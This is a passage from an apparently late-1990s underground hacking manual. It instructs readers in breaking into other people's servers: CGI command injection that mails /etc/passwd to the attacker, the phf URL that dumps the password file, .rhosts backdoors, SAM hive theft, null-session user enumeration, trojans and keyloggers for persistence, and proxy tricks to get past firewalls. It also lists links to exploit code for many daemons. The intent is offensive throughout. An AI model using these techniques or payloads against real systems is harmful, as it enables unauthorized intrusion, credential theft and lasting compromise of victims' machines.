exploits will be in the form of C code (usually), so you'll need to compile them. Most
assume that you have specific header files (*.h), so you may need to find those as well look at the code to be sure. To make obtaining the header files and compiling the exploits
a heck of a lot easier, you ought to think about putting a Linux partition on your hard
drive. At any rate, most remote exploits, if correctly implemented, when launched give
you root access, or at least access. To find out what service an FTP port is running, telnet

to it, it might just tell you. If not, use the SYST command, and then you'll be told. You
may have to log in to do so - try doing so anonymously. As far as SMTP, it hides its
service software and version much less often that FTP does.
Elite Hacker Tactics
Up to this point, you've learned the basics of various NOS's, and how the Internet works.
"When will we get to the core hacking stuff?" You have been - breaking into a system is
nothing more than understanding it thoroughly, knowing the 'rules', what you can and can't
do. Hacking is taking what you know, and using that to circumvent usually half-hearted
attempts to keep casual onlookers from being where they aren't supposed to be. Your
most powerful weapon is a broad knowledge of computers and networks, and thorough
knowledge of your target. Meaning go get yourself a UNIX box. Well, now that you
know the basics of hacking, I'll go into some more advanced tactics you can employ to
gain access to computers on the Internet.
Service Exploitation
One of the first things you should do when you target a particular machine is telnet to
every port and find out what services are running. Find out what FTP service, what POP
and SMTP daemons are running (when you telnet to the appropriate port, it will usually
tell you). Then go to sploit archives like www.securityfocus.com, www.roothshell.com,
and subscribe to BugTraq and NT BugTraq. Look up every service/daemon you find, as
well as the Operating system. Most exploits are in C, so you'll need to put a Linux
partition on your hard drive to get it to compile and run. If you have problems compiling
the sploits, brush up on your UNIX C utilities. Look in the manpages for cc, gcc, and
make (if there is a makefile, which makes compiling the sploits lots easier). Just remember
to chmod the xploit and make it executable, or you'll get a message that the program
couldn't be found.
CGI Exploitation
CGI (Common Gateway Interface) is a method used to make web pages more interactive.
For example. You visit your account at Hotmail. You type your username and password
into the text boxes, and click 'enter.' The hotmail computer then reads what you typed,
and runs a script (which could be in a variety of programming or scripting languages) that
logs you into your account. That's CGI. Anytime you interface with the website (such as
search engines) you are using CGI. CGI adds lots of functionality, and lots of security
issues. There are currently all kinds of know CGI exploitations. Two old ones are
http://www.someserver.com/cgi-bin/phf and http://www.someserver.com/cgi-bin/finger. If
the file in question (/cgi-bin/finger) exists, and you request it, you will get a box up. In the
box, type:
root ; mail you@youremail.address < /etc/passwd. What this does when the computer
runs the script is issue the command:
finger (whatever you type in the box). The ; operator starts a new command, which in this
case is displaying the password file on your browser. Copy it, paste it into a text file, and
crack it. To find CGI exploits, get a CGI exploit scanner (such as WebChk, available at
The CyberUnderground) or use on a web site such as CyberArmy.com or
infinityzone.cjb.net.
Another problem with CGI is that webservers that are CGI enabled have special 'CGI
executable directories'. These include /cgi-bin/ (UNIX), /cg-win/, and /cgi-dos/ (windows

machines). The HTTP daemon knows to execute any file requested in those directories.
Normally, when you type www.someserver.com/index.html, all that is happening is the
daemon sends you a copy of index.html. If you type www.someserver.com/cgibin/program, the daemon will actually run program, if it exists. The output of this process
is usually exported to HTML format and sent to your computer. You as a hacker could
exploit this, though, by running programs of your own on the remote machine (if, say, you
had FTP access but not telnet). Great for spawning exploits.
In order to find out whether or not a particular web server is vulnerable (ie: has a CGI file
somewhere on it that can be used to gain access), you can do a number of things.
Download WebChk to scan for you. Go to a website such as infinityzone.cjb.net and use
their built in CGI scanner. Or, for best results, obtain a list of vulnerable CGI files/servers
and use a browser to scan for them manually. Doing things yourself, rather than using
canned hacker tools, always provides better results along with expanding your own
knowledge.
Sniffiing and Keylogging
Oftentimes you'll need to break into not-so-interesting computers to get to your ultimate
goal. If you are trying to break into your target network's webserver
(www.yourgarget.com), and while trying, found a vulnerability in their mail server
(mail.yourtarget.com), you have a few options on how to get into the webserver from the
mailserver. If you install a sniffer (available at many hacker sites), it will look at all data
passing it on the network for passwords and the like. It will copy and store that
information in a file for you to periodically check. Sniffing (which is considered an eleet
hacker tactic), if done correctly, almost always provides results. Another option is
installing a keylogger on the mailserver. Any keystrokes entered on that computer are
kept in a log file. Periodically check the file, and you'll usually come up with a password
to something else interesting. Be careful though. If you don't hide your sniffers or
keyloggers well, you stand a good chance of getting busted, or at least losing any access
you had.
Leapfrogging
Most firewalls keep you out of 90% of any given network on the Internet. How? They
look at your IP address, and determine if it should allow you in or not. Usually, this is a
router (a piece of hardware used to connect different networks) that has a list of IP
addresses to accept. If yours is not in that list, it will reject your connection. It's a good
bet that this list contains mostly machines inside that network, or from a few other trusted
networks. Oftentimes router firewalls let connections pass from other computers in the
same subnet. Lets pretend you are 203.22.54.77. You want to get into
admin.somecorp.com (34.14.91.15), which is behind the firewall. Www.somecorp.com is
(like most webservers are) in front of the firewall, and is 34.14.91.3. If you try to telnet to
admin, chances are you wont even get a login prompt, just a 'connection failed' message.
But if you telnet to www, then to admin, your IP address is that of www's - 34.14.91.3.
Which is in the same subnet of admin, and will most likely be accepted in. And there you
have your login prompt at admon.somecorp.com. This is conceptually hacking around a
firewall. To break right through, well, you'd better be elite. Fortunately for you, there's a
'Firewall Penetration' section near the end of this text.
Trojans

Dont assume that once you have access (be it a rootshell or just user or guest access) to a
computer, you always will. One good way to increase your chances of keeping access to
this computer is to put in a back door of some kind. The easiest (and arguably most
helpful to a hacker) is a Trojan Horse. Trojans come in all shapes and sizes, for all kinds
of OS's. The three most popular are Back Orifice, SubSeven, and Netbus. All three are
for Windows boxes (try RootKit for a UNIX Trojan). BO by itself is commandline, but
GUI's (Graphical User Interfaces) are available for it. BO has a server (that you install on
your target) and a client program (that you use at home to control your target). With it,
you can browse and manipulate data and directories on your target. You can send
message boxes to the computer to scare people on it. NetBus, on the other hand, has
more functions than BO (like screenshots of your victim, opening and closing the CDROM, etc), but doesn't hide itself quite as well as BO. NetBus, like BO, has a client and a
server. Though Trojans are extremely fun to scare sysadmins, if you want to keep your
access to the box, you should only use it as a backdoor.
Port Hacking
If you can't find any exploits for the daemon you've found, that doesn't mean its not
vulnerable. Theoretically, every daemon bound to a TCP port is vulnerable to be used an
access point to the computers insides. Telnet to the port, and interact with the daemon.
At the top of your telnet window is the word 'Telnet.' As soon as it says 'Telnet www.yourtarget.com' (or some IP address) you are connected, have established a session,
whether you see text or not. Send control characters (control-x, control-c, etc). Type
commands like, GET, GO, START, LOGON, INIT, START, etc. If what you type doesn't
show up on the screen, that means that the daemon isn't echoing your characters back to
you - turn on your local echo so you can see what you are typing.
For example: the HTTP GET command I explained earlier. You can do this manually telnet to port 80, issue a GET command with the page you want to view, hit enter twice,
and the HTML will pour across the screen. You are doing manually what Netscape,
Internet Explorer, and Lynx do for you (except, browsers parse the HTML into readable
text). Any client program that communicates with a server program on some port is just
issuing various commands to the daemon based on how the user interacts with the client
interface. Some times, an initialization command needs to be issued before the daemon
will talk to you. Try anything you can think of. Also, it helps to know what types of
programs are bound to the port you are hacking. Refer to Appendix D on well known
ports at the end of this text.
One last note on this topic. Sometimes, sysadmins, authorized users, and even other
hackers will bind a daemon to some extremely high port number as a back door. Casual
portscans will miss these, unless they are set to scan to high numbers. If you see port
12345 or 31337 open on some computer, someone was here before you - these are the
defaults used by the Netbus and Back Orifice Trojans. Also, lazy system administrators
sometimes put daemons on high port numbers that let them telnet in without a password.
NT: The SID
In an NT environment, every user, group, and domain has a unique numeric value that
represents it. If you change the name of a particular group, this number the SID (Security
IDentifyer) stays the same, so the groups properties remain unchanged. And with a valid
connection to an NT box, you can use the SID to find valid login names for that machine
(if you have a connection to the PDC youll get login names for the whole domain).

Youll do this with the infamous user2sid and sid2user tools, available at
www.hackingexposed.com. Getting every username is invaluable for Brute Forcing - put
the names you find into a text file and use NAT, Legion 2.1, or Brutus to take care of the
rest. The first step, though, is connecting to the box in question. Use the Net View
command - if you dont have a login name, the null IPC session technique will usually
work (net use \\ip_add\ipc$ /user:). Once you get a command was completed
successfully for any net use command, youre connected, and can use the sid tools to get
every username. (The reason this works is because the LookupAccountName and
LookupAccountSid Win32 system calls can be called by anyone with Everyone access including someone with a null IPC session.) Lets say you null IPCd 38.100.200.1. You
want to find members of the group Domain Users, which is essentially everyone (this
woks only if 38.100.100.1 is a domain controller - Domain Users doesnt exist on non
DCs). Youd type this at a command prompt:
C:\toolz>user2sid \\38.100.100.1 domain users
Which would give you that groups SID. Pretend you get:
S-1-5-7464736-37373837-513
We are interested in the last three digits of the SID: 513. These last digits are the RID.
The RID is the only number that will be different for every other user and group SID.
Meaning every other SID in this domain will start with:
S-1-5-7464736-37373837
And a different 3 digit RID exists for every group and user. We now know that domain
users RID is 513. The Administrator account is always RID 500. To verify that, well do
this:
C:\toolz>sid2user S-1-5-7-464736-37373837-500
User Admini
There - it told us the user for that SID. Only this sysadmin thinks hes slick by changing
the Administrator account to Admini. Heh. Now, do the sid2user account to ever RID
from 501 until you get an error saying no such SID. So next youd:
C:\toolz>sid2user S-1-5-7-464736-37373837-501
User asmith
And so forth. If youre connected to a non domain controller (member server), youll get
every user for that box. If its a DC, youll get every global user - that is every user
associated with the domain itself, not an individual computer. Now you have a list of login
names to BF.
UNIX: SUID Binaries
This is a biggie for any aspiring UNIX hacker. You get access to a UNIX box, and want
root. Youre first step should be the password file. If its protected (you dont have access

to it), next youd look for common vulnerabilities - and local exploits for them. Check the
System Exploit section below for common ones. If you dont see any at first glance, that
doesnt mean there are no vulnerable filez. Daemons arent the only programs vulnerable
to buffer overflows. Any binary (executable) might be vulnerable. These binaries have
access privileges of their own - just like a user. They can be denied or accepted access to
other resources just like a user can. All users and binaries have UIDs (User IDs) and
GIDs (Group IDs) - and the lower the better (root being zero). Binaries with low
privileges (high number UIDs) will often be denied when they try to access other files.
Binaries with higher privileges (lower UIDs) will have more access. So naturally we want
to sploit a binary with root - equivalent privileges, or perms (permissions). Binaries with
Superuser User IDs - SUID perms. And with one command-line you can find every
SUID binary on the system:
$ find / -type f -perm -04000 -ls
The output of this command will give you every binary with SUID perms, or root
privileges. The list will probably be pretty big. Go to a Exploit archive with a searchable
database (Rootshell or SecurityFocus) and look up every SUID binary you found.
Chances are one will be vulnerable - get the code, run it, and youll have root.
Peering through the Eyes of your Enemy
Hacking pits you against a system. This system, be it a huge inter-network or just one
computer, is nothing by itself. Servers dont run and secure themselves. An administrator,
or sysadmin, runs them. Hacking into his box is going head-to-head with the sysadmin.
So how do you gain the competitive edge? You need to see the playing field from his
point of view.
There will come times when the prewritten exploits dont work on your target system, and
brute force either didnt work or is too unstealthy for a hacker as leet as you. What do
you do? Well, suppose the server youre trying to crack is a Netscape Enterprise Server.
Install Enterprise Server on your machine. By doing this, youll get a number of valuable
pieces of info.
Default Directory Structures - where you can find stuff
Default Passwords - worth a try
Out-of-the-box scripts - CGI stuph that you could exploit
If youre serious about hacking a system, you (usually) are better armed knowing about it.
And the more the better. Most server software will have a free evaluation version.
Otherwise check the warez pages.
No matter what server youre hacking, you definitely want some kind of UNIX partition
and an NT partition. Get RedHat, SuSE, or Caldera LinUX (most versions are around
$30) and play with it. Set up an account with no privileges. Download exploits (remote
and local) and try to get root on your own box. Then do the same with NT. Try the
getadmin and iishack exploits. Once you have a feel for how these more common xploits
work, youll be better at using them against a real target.
System Exploits
You target a network. Scan ports on every machine, telnet to every open port to find out
what service is running, and look up every service at every exploit archive. Within a few

hours, youll have a list of at least a few vulnerabilities, meaning a couple of ways in.
Remember: in every network there is always at least one insecure computer. And from
that box you can hack the rest of the network without much trouble (using local exploits
and passwords stolen from the first system you hacked). Here, again, is a list of places to
go to look for exploits. If you find info on one exploit somewhere, still check the others
for better or updated info.

www.rootshell.com
www.securityfocus.com
www.ntbugtraq.com
www.insecure.org
www.anticode.com
www.infilsec.com/vulnerabilities
www.xforce.iss.net
www.hoobie.net/security/exploits
www.net-space.org/lsv-archive/bugtraq.html
home.cyberarmy.com/tcu

Here I will go over specific vulnerabilities to look for in any system you're trying to hack.
For more info on each of these, visit the exploit archives above. Most give either an
explanation on how to exploit the security bug, or offer code that will do it for you.
MS Front Page ASP Dot and ASP Alternate Data Stream Vulnerabilities (remote)
These exploits effect FrontPage version 3. Any ASP file (the NT equivalent to UNIX .cgi
files) is viewable to a hacker, by just appending a dot to the end (eg: request somefile.asp
like this: somefile.asp.). ASP code oftentimes contains local file references and even
usernames and passwords).
Another way to view ASP code is to append the string ::$DATA to the URL. Eg:
somefile.asp::$DATA. If the server youre targeting is patched against the dot
vulnerability, try this one.
IIS Remote Buffer Overflow Vulnerability (remote)
A lot of IIS Webservers (IIS is the webserver that comes with NT) are vulnerable to this
exploit. Using the exploit code iishack.asm (assembly) or iishack.exe (win32 binary) you
can force the IIS web daemon to download and run any file on the Net you specify including ncx or netbus. The code is available at www.technotronic.com and
www.eeye.com.
IIS RDS Vulnerability (remote)
A lot of IIS Servers are also vulnerable to this attack. If the server has Remote Data
Service enabled (including msadc.dll - which many do) you can run the exploit code from
your home computer and send commands to the server. Copy
\winnt\system32\repair\sam._ to \inetpub\wwwroot\ and download the SAM hive. The
exploit code is available at rootshell and securityfocus.
WebSitePro Vulnerabilities (remote)

Out of the box, WebSitePro for NT has a few vulnerabilities. The CGI file uploader.exe
allows anyone to upload files. Check for it in /cgi-win/, /cgi-dos/, /cgi-bin/, or /cgi-shl/.
Also, any files you upload into any of these directories can be executed (by just requesting
them with your browser). Can you say Netbus?
NT Getadmin Exploit (local)
The executable exploits getadmin.exe and sechole.exe will make any user of the machine
members of the Administrators and Domain Admins groups. If you hack into an NT box
with a user account that doesnt have a whole lot of permissions, use one of these exploits.
Theyre available at anticode.
NT RAS Buffer Overrun (local)
This local exploit exploits rasman.exe into spawning a rootshell (command prompt with
system privelages). The exploit code and more info is available at
www.infowar.co.uk/mnemonix/ntbufferoverruns.htm.
Winhlp32 Buffer Overrun (local)
Using the exploit code, a hacker can run a batch file with system privileges. Put rdisk /s in
the batch file to dump the SAM onto the hard disk. Exploit code and an explanation at
www.infowar.co.uk/mnemonix/ntbufferoverruns.htm.
Cold Fusion Vulnerabilities (remote)
Cold Fusion has its own scripting language for CGI. These scripts are .cfm files. The
/cfdocs/expeval/openfile.cfm file allows you to upload any file to the server. The problem
is, the /cfdocs/expeval/exprcalc.cfm file (the script used to view the file you uploaded)
deletes the file after you view it. Openfile.cfm exists to help you debug a cfm file of your
own. The vulnerability: exprcalc.cfm can be manipulated to delete itself - which will keep
it from deleting files you upload. L0phts website along with SecurityFocus has a cfm
script you can upload (called mole.cfm) that gives you full access to the server.
Apache PHF and Finger Vulnerabilities
These are two very old vulnerabilities, but still exist on some servers, and are worth
mentioning. Apache (a popular Linux webserver) stores its CGI scripts in /cgi-bin/ (which
is common). If /cgi-bin/phf exists, you can enter the following URL:
http://www.abouttobehacked.com/cgi-bin/phf?Qalias=x%Oa/bin/cat%20/etc/passwd
And you will have the /etc/passwd file cat-ed (displayed) in your browser. Crack it with
John the Ripper and youre in. If /cgi-bin/finger exists, you can use the text box on this
page to finger the box. If you enter root in the box, a shell will execute finger root on
the UNIX box. So if you type root ; /bin/mail you@hacker.com < /etc/passwd the shell
will execute finger root ; mail you@hacker.com < /etc/passwd. A semicolon separates
commands in UNIX, so what happens is the shell executes finger root, then executes
/bin/mail you@hacker.com </etc/passwd. This mails the password file directly to your
email account. Its kinda like breakfast in bed.
Apache Test-cgi hole (remote)
The cgi file /cgi-bin/Test-cgi is used to test the server-side functionality of Apache CGI.
You can exploit it to peruse directories. To see everything in the /cgi-bin/ directory, youd
request http://www.victim.com/cgi-bin/Test-cgi?*. This will show you all the cgi files,

including other vulnerabilities. To see whats in /etc of the server, youd request /cgibin/Test-cgi?/etc/*. The output of any of these requests will list general info. The query
filed of this output will return your response: the directory listing. Try it - it works.
Apache count.cgi hole (remote)
The flie /cgi-bin/count.cgi file displays a counter on the webpage, returning the number of
hits to that page. It is vulnerable to a buffer overflow, though. The C code to do so is
available at Rootshell, SecurityFocus, and a few other archives.
AIX crontab vulnerability
AIX UNIX machines have a file called crontab, which is vulnerable to a buffer overflow.
Get the exploit code at www.sw.com.sg/Download/cert_advisories/CA92:10.AIX.crontab.vulnerability, or rootshell or securityfocus.
ProFTPd Buffer Overflow vulnerability (remote)
ProFTP version 1.2.0 is vulnerable to a buffer overflow that will spawn a rootshell for
you. Get the code at rootshell.com.
CuteFTP Weak Encryption Vulnerability (remote / local)
Tree.dat (ver 2.X) or smdata.dat (ver 3.X) holds encrypted FTP passwords. Hardly
encrypted though - the algorithm is nothing more than adding the 48h ASCII value to
each character. Meaning the number of characters in the hash is the number of characters
in the clear-text password. And you dont even need a password cracker - just grab an
ASCII chart and ad 48h to each character - youll get every password in the file.
Wu-FTPd Signal Exploit (remote / local)
If your target has a vulnerable version of wuftpd (the WU FTP daemon), and you have any
access (including guest, username ftp) the signal exploit will overspill the incoming FTP
buffer, giving you a shell with root privileges. Rootshell and security focus have the C
code for the signal exploit.
IRIX Line Printer Vulnerability (remote)
This exploit doesnt require a script or even CGI exploitation. Certain versions of AIX (by
default) have the lpr login name unpassworded. To login, just hit enter when prompted for
a password. Later versions fix this problem, and security savvy sysadmins will change the
password or disable the account.
Linux RCP Vulnerability (remote)
Certain versions of Slackware and Redhat that have a listening RCP (remote copy) are
vulnerable to a buffer overflow. This can be exploited to gain a shell with the privileges of
the user nobody. For specific info, visit www.geek-girl.com/bugtraq/1997_1/0113.html
SunOS / Solaris rlogin Vulnerability (remote)
Yes, the rlogin daemon of some Sun machines are vulnerable to a buffer overflow that will
lead to a root compromise. Get the code at Rootshell, SecurityFocus, or
rtfm.ml.org/archives/bugtraq/Nov_1997/msg00181.html.
AIX dtterm Vulnerability (local)

Get a rootshell with a vulnerability in dtterm for AIX. Get the exploit at
esperosun.chungnam.ac.kr/~jmkim/hacking/1997/07%26before/aix_dtterm.c
AIX mount Vulnerability (lo cal)
The mount utility - used to mount local disk drives and remote network filesystems, is
vulnerable to a buffer overflow. The sploit is at
samarac.jfactorx.org/Exploits/AIX_mount.c
Solaris X86 PPP Vulnerability (local)
There are a few vulnerabilities in Solariss implementation of PPP that will give you the
ability to write to any .rhosts file. From there, you can echo + + > .rhosts as described in
the UNIX section, and rlogin into any account without a password. Get info at
www.unitedcouncil.org/c/asppp.txt.
ELM Autoreply Vulnerability (local)
If a .autoreply file exists in a users home directory (UNIX), it will be used to auto-reply to
any email that reaches the users inbox. The file itself is nothing more than a shell script.
For example: user tgregor goes on vacation, and makes his .autoreply shell script send a
letter back to anyone who sends on to him, telling them his is on vacation. So if you, a
hacker, can get write access to someones home directory (who uses ELM for an email
client), you can write your own .autoreply file. Make it do something like echo + + >
.rhosts. Then send him an email - the script will run, and you can now rlogin to that
persons account. Slick, eh?
Solaris GetHostByName Vulnerability (local)
Solaris version 2.5.Xs gethostbyname system call is vulnerable to a pseudo-buffer
overflow. Get the exploit code at www.netcraft.com/security/lists/gethostbyname.txt
BSDI Screen Vulnerability (local)
The BSDi OS (UNIX) has a file called Screen that can be sploited to view passwd files.
The exploit is at www.sabotage.org/rootshell/hacking/screen.txt
SunOS Sushi Ping (local)
SunOS 4.1.X is vulnerable to this ping attack. If you can execute it, youll have a
rootshell on the Sun box. Get an explanation and the code at
www.unitedcouncil.org/c/sushiPing.c
FreeBSD Rdist Vulnerability (local)
This exploit works on most versions of FreeBSD, and will get you a rootshell. Get the
code at www.society-of-shadows.com/security/rdist-ex.c
FreeBSD Sendmail Vulnerability (local)
Sendmail, and SMTP daemon (one with a history of vulnerabilities) is vulnerable to a
buffer overflow - from the inside (locally). FreeBSD 2.1.X is vulnerable - the code is at
www-jcr.lmh.ox.ac.uk/rootshell/hacking/FreeBSDmail.txt
Linux Memory Vulnerability(local)

This isnt so much a buffer overflow as it is an entire memory address range overflow.
And it will get you root: go to www.society-of-shadows.com/security/mod_ldt.c for the
code.
Linux NCSA Vulnerability (remote)
This is a biggie that has made many hackers happy and many sysadmins unhappy. The
NCSA httpd is vulnerable, and if properly exploited will give an attacker a remote shell.
The exploit is at: www2.fwi.com/~rook/exploits/linux_httpd.c
Redhat inetd Vulnerability (remote)
Redhat is a popular distribution of Linux - used by the author of this manual.
Unfortunately, imapd (a daemon running by default) is vulnerable to a buffer overflow
leading to root - from the outside (remote). The xploit code is at
mayor.dia.fi.upm.es/~alopez/bugs/bugtraq2/0263.html
Linux Mouse Vulnerability
Yes its true. Specific mouse support for Linux can be exploited to get root. Go to
www.asmodeus.com/archive/linux/GPM-EXPLOIT.TXT
Some exploits I went into more detail with and explained how to use them, some I didnt.
If you want step-by-step instructions on how to exploit each vulnerability, youre out of
luck. Be a hacker: research it, or better yet, experiment with the vulnerable daemon or file
yourself. Most exploit archives have at least a little description of how to use each
exploit. If its a CGI vulnerability, play with the URL a bit. Put a ? at the end of it, and
see what happens. Also, learn the extensions of certain code. For example a .c file means
its c code, and needs to be compiled with cc or gcc (try both). .pl files are Perl scripts,
and will be interpreted with Perl or Perl.exe. .asm files are assembly, and need an
assembler to be compiled. .sh files are shell scripts (usually) so just use the correct UNIX
shell to run it.
If the exploit needs to be compiled and ran, do so with both cc and gcc. Some exploits
were written for a specific shell - the C and TC shells usually work best, since their native
commands more closely resemble the C programming language. Also, some exploits have
critical lines of code commented out to keep complete lamers from using them. So check
for them. What does commented out mean? Programmers often put comments in their
code, like this line executes the main proc or something similar to explain their code to
other programmers, or even themselves. These comment lines start with things like:
/*

rem
and the like. If you see a commented line that looks like code, and not a comment,
uncomment it and try to recompile. If youre having troubles compiling an exploit, get
yourself a intro to that programming language, and learn enough to spot possible
problems. Seem like a lot of work just to get one little exploit to work? Then give up - or
be a hacker and learn.
Firewall Penetration

Ahh firewalls. Technology with only one purpose - keeping hackers out. Many newbies
are intimidated by a system they know has a firewall, and don't even bother. Technically,
though, every network has a firewall. A firewall, by definition, is nothing more than a
system used to secure the network. Nothing specific, just that and nothing more. So if all
that is blocking a network from outside access in a UNIX login prompt, that is its firewall.
Generally speaking, though, when we refer to a firewall, there are a few distinct levels.
Here I'll explain those levels, and how to circumvent them.
Routers as Firewalls
When you scan a class C subnet, and find three computers, do you think that those are the
only three computers on that network? Not usually. Every network that is connected to
the Internet is connected via a complex piece of hardware known as a router. Routers
route packets of data based on the source IP address of the sending machine, and the
destination IP address of the receiving machine. Similarly, routers can block certain IP
addresses. Every packet of data sent to any computer in your target network must pass
through the router connecting the two, and if the router is programmed to not let
connections be made to one particular computer, it will discard all packets sent to it, thus
blocking you from connecting to it. Also, routers can be setup to allow connections to
certain machines, but block certain port numbers. So if you scan a machine that has an
open port 23 but is being blocked by the router, you won't be able to establish a
connection. It is rare, though, that routers are configured to disallow connections from all
IP addresses. Generally, it will allow a select number of IP addresses through. Like
affiliate companies, or different networks of the same company. So how do you penetrate
a firewall router that won't let you through? Masquerade as a trusted computer. Bounce
your connection off a computer that the router might let by. For example, lets say you
hacked an account on the webserver (port 23 was not blocked). That's not enough for
you - you want root on the hub computer of the network. But port 23 is blocked on it.
You might connect to the webserver, then, from it, telnet to your target machine. Chances
are the router will let you connect - why wouldn't it let a computer from its own network
connect?
Any computer that is blocked by a IP filtering router is said to be behind the firewall. Any
that is not blocked is said to be in front of the firewall. There are a number of computers
that cannot be behind a firewall. The web server, for example. How could people get the
web page of your target if it was blocked? Also, mail servers have to be in front of the
firewall, so that emails aren't blocked, and get sent t
appropriate recipient. Name servers (computers with port 59, DNS, open) also cannot be
blocked, as they are the computers that translate names (such as www.microsoft.com) into
a network IP address. The trick to connecting to a computer blocked by a packet filtering
router is to masquerade as a computer in a trusted network, or from a computer in front of
the firewall.
There are other ways to masquerade as a computer from inside your target network to
pass through a firewall. What if your target machine is an NT Server? There is no telnet
daemon. Well, if there are NT servers on the network, there will be NT Workstations and
Windows 9x boxes too. And those machines will probably have internet access. How do
they connect to the internet? Via a proxy server - all HTTP requests are directed to the
designated proxy server, who requests the URL for them, gets it from whatever webserver
the web page is on, and sends it back to the workstation inside the internal network that
originally requested it. Remember that when computers surf the Internet via a proxy

server, their IP address (to the Internet) is that of the proxy servers (read the 'keeping from
getting caught' section for more details on how this works, or check the definition of
'proxy server' at the beginning of this text). So how do you connect to a webpage inside
on an internal computer that is blocked by the router? Connect via the network's proxy
server. If a proxy server exists (which one will, 99% of the time), it cannot be blocked by
a firewall - how would the requested web pages be sent back to it if it were? Okay, so we
know that one of the computers that turned up on a subnet scan is probably a proxy
server. Your next step is to use it to make connections for you. Go to your Netscape of
Internet Explorer settings, and select 'proxies.' (Note: proxy setting on your Internet
Preferences of Control Panel only work if you are physically connected to the a proxy
server, meaning on the same LAN as it.) For HTTP ports, try 80, 8080, 88, and 8888.
For FTP, try 21, 2121, etc. Its less common, though, for proxy servers to be setup to
handle FTP preying. So for each computer you found on the subnet, enter it in as a proxy
server in your browser settings, hit 'Okay,' and then just request any web page.
Www.hackers.com, or whatever. On the bottom of your screen, you will see your
browser attempting to connect to the proxy server. If you get an error message, the
computer is not a proxy server, or you specified the wrong port number (try some others).
If the web page you requested shows up on your browser - congratulations, you
connected to the proxy. Now request pages (or an FTP session) with a computer behind
the firewall - chances are it will let you in since your IP address is now the proxy servers
when making connections of the protocol you specified to use proxies for (and again,
firewalls generally allow connections from computers of its own network). Now, proxy
servers will allow computers to use it as a proxy based on a set of criteria. These are:

Always - any computer connecting will be allowed to use this proxy (known as a
public proxy)
Depending on who connects to it, ie: the IP address of the connecting computer,
or
If the connecting computer can validate itself with a username and password

If you are prompted with a username and password request, you are not out of luck. Get
yourself WebCrack, enter the proxy server as the target machine, and launch an attack.
Proxy server authentication is exactly the same as password protection of private web
pages, and WebCrack will brute force until its let in. Once you find a valid username and
password combo, you will be able to use the proxy. Now connect to the computer
blocked by the router.
You've just cracked a firewall.
Private IP Networks as Firewalls
Certain ranges of IP addresses are known as 'private.' For example, all the 10.x.x.x (class
A) and 172.16.x.x (class B) networks are private, and if you try to connect (telnet, http,
whatever) to one of these addresses, the address will not resolve (ie: you wont be able to
connect). Often times, companys will use a range of private IP addresses, in order to
keep hackers out. This is another form of a firewall. However, if the company wants their
network connected to the internet in any fashion (for their workstations to be able to surf,
or for email, or whatever), at least on computer has to have an public IP address, meaning

an IP address that the Internet (and therefore you) can connect to. This computer is a
proxy server of types, and generally has two Network Interface Cards (adapters used to
connect network cable to), one with one of the private addresses, on with a public
address. This 'public' computer, being the specialized proxy server, will (unlike your
computer, and any other on the Internet) understand the private address. So to connect to
the 10.x.x.x (or whatever private address your target uses internally), you'll need to
connect to the proxy server. If its a UNIX machine, you'll have to get an account with
telnet access, and telnet from it to your destination. If its a Windows machine, you'll have
to use the preying method explained above. The reason that this machine understands the
private addresses is because it has an ARP (Address Resolution Protocol) table for those
computers. For more info on this, look into ARP and IP routing.
Since the proxy server is the only computer on the entire Internet that is able to connect to
the private network protected by this type of network, you will have to connect through it.
One other option is hacking into it, and installing a port redirector program. For example:
if you can install NetBus onto the computer, you can set it to redirect all connections
made to a port you specify to another address. So lets say when you try to connect to
10.2.56.14 (reserved) with telnet, you get a 'failed to resolve address' message, meaning
that address is not on the Internet, and your computer (nor any other on the Internet)
understands that address. But you know that 204.56.87.5 (an address that is on the
Internet, and that you can connect to) is the proxy server for the 10.2.56 network. You
break in, install NetBus, and set the port redirector to 10.2.56.14. Next - telnet to
204.56.87.5 (on the port you specified to be redirected) and sine 204.56.87.5 knows
where 10.2.56.14 is, your connection will be bounced over to that machine.
Congrats - you've just penetrated another firewall.
In Summary
With this text I've scratched the surface of the hacking of today. If nothing else, you
should have learned just how much you're going to have to learn to become a proficient
hacker. You'll need to learn more about various protocols, about different operating
systems. Learning programming languages such as C or Perl would definitely help you.
There are a lot of programs out there, but most do the same as its legitimate counterpart
would do, and don't allow much room for fine tuning. Imagine the power in the ability to
write a target-specific program to aid you in hacking it! Anyways, I also strongly suggest
installing Linux on your machine as well. UNIX is more powerful (and therefore more
complex) than DOS and Windows, and the only way you'll learn anything about it is to
have it (not to mention raw sockets!). Even a book wouldn't be of much use if you had
nothing to apply what you've learned on. When faced with a challenge that you don't quite
understand, fumble your way through. Try not to ask for help all the time. You'll learn a
lot more that way - and not just about the obstacle in question. In closing, let me say that
you should never decide that you know enough. An unquenchable thirst for knowledge is
what drives the real hacker. The process, not the end result. I guess I see no better way
to end this text than with my favorite quote (from a good friend of mine):
"What do you want to hack today?"
[ Kurruppt2k ]
Shoutouts and Credits

Most of the info and methodologies here is from first hand experience. Some of the
Exploits listed I got from Maximum Security (but I tried them, to make sure they work),
and SecurityFocus. Inspiration? Go download a few good techno MP3s (all available at
mp3.com) - Matrix by Wintermute, Darth Techno by Raver FX, and Linux vs. Win NT by
Noize Concept will all set the stage for some serious haxoring.
And a manual like this wouldnt be complete without a few shoutouts to my cohorts.
Shoutouts go to: Raz0rphane aka RiotKl0ne, _Syn, the LoungeRaptor, Grim Ph0enix,
Dr34d 451, Enz00, WCU, HeadCase, ViRuSS, and Blu3skr33n, and all of Shadow of the
iNode. Phear SiN.
If you (the reader) can think of anything youd like to see added in future releases, or just
have any criticisms, email me at kurruppt2k@mailcity.com. Thanx.
Appendices
Here is a compilation of miscellaneous info that either had no logical place in the flow of
the manual, or is just kinda a chart or list of info that is better appended to the end. Have
phun.
Appendix A - Dialup Hacking
This is something that has almost gone away completely. Back in the old skool days of
hacking, people connected their networks by dialing into computers of their remote
offices. Leased digital lines (such as T1s, DSL, or Frame Relay) were much too
expensive for most, so modems and the PSTN (Public Switched Telephone Network)
were used. Nowadays, though, companies connect their networks with either dedicated
digital lines, or over the internet (with technologies such as VPNs, explained in the crypto
section of Intro to h/p/v/c). And thats how hackers connected to their victims - by
dialing directly into them. This limited hackers techniques to primarily brute force, social
engineering, and trashing. Only being able to dial in is like having port 23 the only open
port on every machine you ever try to hack. Not much phun.
Today, though, hackers do their work over the Net. On occasion, though, you may find
yourself dialing right into the system youre trying to crack. Why? Maybe youre target
isnt on the Net, but have a modem. Maybe while tiptoe-ing around you found that one
machine on their NT network was a RAS server, and want to dial in. For whatever
reason, youll probably dial into at least one machine in your h/p career.
